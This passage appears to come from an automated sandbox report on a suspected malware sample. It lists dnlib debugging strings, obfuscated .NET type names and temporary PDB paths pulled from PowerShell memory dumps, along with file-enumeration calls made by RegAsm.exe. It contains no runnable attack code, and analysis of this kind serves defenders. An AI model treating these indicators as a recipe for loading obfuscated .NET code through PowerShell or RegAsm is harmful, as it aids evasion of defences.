                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D060000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000E.00000002.535276986.000007FE89C60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.535388004.000007FE89C40000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.pdb source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D060000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000001E.00000002.524728452.000000001295E000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529986133.000000001CE00000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529986133.000000001CE00000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: hunkIHeapIMetaDataListenerDummyMetaDataListenerMetaDataEventIModuleWriterListenerDummyModuleWriterListenerModuleWriterEventIOffsetHeap`1IWriterErrorCor20HeaderOptionsImageCor20HeaderImportAddressTableImportDirectoryIMDTableMDTable`1<GetRawRows>d__31MDTableWriterMarshalBlobWriterMaxStackCalculatorMetaDataFlagsMetaDataOptionsMetaDatak2nmAi42SiU6tG7RohOq`2gT5xFA425EjqLRUbluTfB8M9U442fHfvCwWJTRuG`1MetaDataHeaderOptionsMetaDataHeaderMethodBodyMethodBodyChunksITokenCreatorMethodBodyWriterMethodBodyWriterBaseModuleWriterOptionsModuleWriterModuleWriterOptionsBaseCreatePdbSymbolWriterDelegateModuleWriterBaseModuleWriterExceptionNativeModuleWriterOptionsNativeModuleWriterOrigSection<GetSectionSizeInfos>d__59NetResourcesnXZDoh4F5VkwYDGidXAePf5Fgg4FiHZ1nM3bJq4jPEHeadersOptionsPEHeaders<GetSectionSizeInfos>d__61PESectionS9nLmq4Kc7SiWyjGbN1tpL7Hc44K8tmypZbOcZNgwWGsMK4Wix4eJl5yKKA2`1eTgauU4WKEU9eI8KNWBN`1<>c__DisplayClass30_0RelocDirectoryO2gyxB4x5FODyAyFxIYuMY71kl4xinw8E0XtGINGR6IG2W4x9imEEkr7jZIpu5qc2R4xK6a5MlmnlSqHISignatureWriterHelperSignatureWriterStartupStubStringsHeapStrongNameSignatureTablesHeapOptionsTablesHeapUSHeap<GetAllRawData>d__17UniqueChunkList`1Win32ResourcesChunkhqyuh84Tkmlqq6o6Nnk4gnvTau4TG7dlLot4qU6GBuiltInResourceDatadnlib.DotNet.ResourcesIResourceDataResourceDataCreatorbk7KjU4ZisbNU4Zo0ogNSerializationBinderSystem.Runtime.SerializationAVbMcb4ZFBlPaZdQlXAWResourceElementResourceElementSetResourceReaderExceptionCreateResourceDataDelegateResourceReaderXlS2tx4V9ICaFZXd4M3kResourceTypeCodeResourceWriterUserResourceDataBinaryResourceDataUserResourceTypeIMAGE_DEBUG_DIRECTORYdnlib.DotNet.PdbISymbolWriter2PdbDocumentPdbImplTypePdbScopePdbStatezwWAHs4MAMX6GvB6CgvlPdbWriterzXqFUX4JWZjrcmy4ceTT<GetScopes>d__17SequencePointSymbolReaderCreatorSymbolWriterCreatorIMetaDataDispenserdnlib.DotNet.Pdb.DssISymUnmanagedBinderISymUnmanagedReaderISymUnmanagedDocumentISymUnmanagedMethodISymUnmanagedVariableISymUnmanagedNamespaceISymUnmanagedScopeIMetaDataImportIMetaDataEmitISymUnmanagedWriterISymUnmanagedWriter2ISymUnmanagedDocumentWriters3AFAe4lX1c5L15ssGaKgSnlGD4lLsoAn7qHm2GmY8NgBr4lK0BweLrZnNgPl8RLGl4lfdXabYWoKDxYUq8QQI4lWJrCiqYasAjWhpPGVE4lxMvDaQyEb9pLtR26Ex4lYvQp6R9Km4RyeIIVX64lvt2uCTyCMV7qAdbfRr4ljLgOYFe6USGnsVFehp4tuu3uWVuXJoVvoB8bqG4ta40Rc7sfoP6VsGmK2F4t9WUay6TuKYEoUMSKlF4tKtFtNxWPetumsp3EEq4tfSeo3d26PuoGc7DArj4tWLdQJhFDqkUYY8TjB34txspg6vFEEVmZDOictU4tOGbaP6sXqraWQpQOUk4tM7rjkQLr8Z5JpAUt524thMKV9nkg6FJATrZoW84trN80DUPJqpNiMrNGaR4tjf7WIhsTlKYUbQSJnb4twUHesxC7oQ58jAaUyg4AUA3lUeloVHTMdQVnW84ABSj0XTxemlrQNtB38a4AfOHPtD2mZqgvHSLYEp4AWFBnYB1U8RbSOZA1BB4ATp9drOm8MHxvwLPtbH4AZbQMwB4y4NJXzBwObt4Al65utCLBbZhqqXAP4g4Atk84HQJqf60IRbZMlX46cCtwSOd07lKPnLh8o94682lNM67NhqTCTkKYIK46DHmoRDXtuhZrbpBcj246nRIl1ORk4n1PsEKobk466uUQKXCylJ21gp8fdO46mKPkq9WDpTi8SpLyAZ4m2L8oJHFLJlK3hvSyTk4mPrsjYd7F5BvBb6juWk4haR9wWBN20IFtc3dTth4h021BeHX9OMg2RrNCRt4hyAs2KDq7JkhqtmAyPy4h11h8Grbtua8kVUen7V4rbCrfYA3Wvf79ykrZd04r4lEpbrvnLI3Ah0P0pu4r8jcmbomq9fvxGwJJUf4rSwIUHoY99uDkVrFbjs4rkIKt9eTILaMeDij
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529986133.000000001CE00000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D060000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.pdb source: powershell.exe, 00000005.00000002.450249616.00000000038A6000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000E.00000002.535276986.000007FE89C60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.535388004.000007FE89C40000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.pdb source: powershell.exe, 00000011.00000002.494980205.00000000028C4000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.pdbhP\ source: powershell.exe, 00000011.00000002.494980205.00000000028C4000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_10006580 FindFirstFileExA,20_2_10006580
